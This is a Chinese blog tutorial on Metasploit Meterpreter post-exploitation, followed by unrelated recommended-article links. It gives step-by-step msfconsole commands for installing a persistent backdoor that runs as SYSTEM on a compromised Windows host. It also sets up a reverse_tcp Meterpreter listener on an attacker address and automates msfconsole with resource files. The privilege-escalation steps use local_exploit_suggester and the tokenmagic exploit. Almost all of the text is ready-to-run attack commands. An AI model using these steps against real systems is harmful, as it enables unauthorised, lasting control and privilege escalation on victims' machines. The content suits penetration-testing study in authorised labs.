Metapreter实现持续访问,自动化,提权--详细教程

Metapreter 实现持续访问

1.先拿到目标主机的控制权限后,将目标主机的会话转入后台,切换到 exploit/windows/local/persistence 模块,注意这个模块选择的payload,因为在后面进行监听的时候需要和这个payload相同

2.通过options查看需要填写的参数

EXE_NAME 生成后门文件的文件名称(非必要,用默认)

PATH 后门文件的存放路径 (非必要,用默认)

REG_NAME 注册表设置的名称 (非必要,用默认)

SESSION 作用于那个会话

STARTUP 由那个用户来运行这个脚本(一般都写SYSTEM,注:这里必须大写)

VBS_NAME VBS脚本的名称 (非必要,用默认)

set SESSION 8
setg lhost 173.30.1.3

3.执行
exploit


  1. 打开kali监听模块 exploit/multi/handler
    use exploit/multi/handler
    set payload windows/meterpreter/reverse_tcp
    set lhost 172.30.1.3
    set lport 7723
    exploit -j -z

-j 加入任务
-z 后台运行

Metapreter自动化

msfconsole -q -r <文件名> 启动时读取文件命令执行实现自动化

cat msfstart.txt

msfconsole -q -r msfstart.txt

这里会自动执行文件中的命令

Metapreter提权

local exploit suggester 模块(本地漏洞利用),用来做提权
search suggester

use 0
options

set session 1
exploit

可以尝试前面绿色的

use exploit exploit/windows/local/tokenmagic
options


set session 1
set LHOST 172.30.1.3
exploit
getuid

提权成功

相关推荐
xlq2232212 小时前
9.make_进度条
linux·运维·服务器
流水线上的指令侠13 小时前
C# 实战:从 0 到 1 搭建基于 NUnit + FlaUI 的 WPF UI 自动化测试项目
功能测试·ui·c#·自动化·wpf·visual studio
玄斎13 小时前
华为ENSP配置实验:双网段互通 + DNS 解析 + Web 访问,一步实现全网可达(基础)
运维·服务器·网络·学习·华为·hcia·ensp
苏三福13 小时前
clawdbot 使用
linux·运维·ubuntu
岳来13 小时前
docker 容器参数LinkLocalIPv6Address 和 LinkLocalIPv6PrefixLen
运维·docker·容器·ipv6
海域云-罗鹏13 小时前
该如何选择深圳进行算力服务器托管
运维·服务器
init_236113 小时前
【hcie-09】vxlan 同子网通信
linux·运维·服务器
爱吃生蚝的于勒13 小时前
【Linux】进程信号的产生(一)
linux·运维·服务器·c语言·开发语言·数据结构·c++
橙露13 小时前
云原生运维实战:阿里云 ECS 服务器安全加固与性能调优指南
运维·阿里云·云原生
China_Yanhy13 小时前
我的区块链运维日记 · 第 7 日:影子区块的诱惑 —— 多节点下的“重复充值”危机
运维·区块链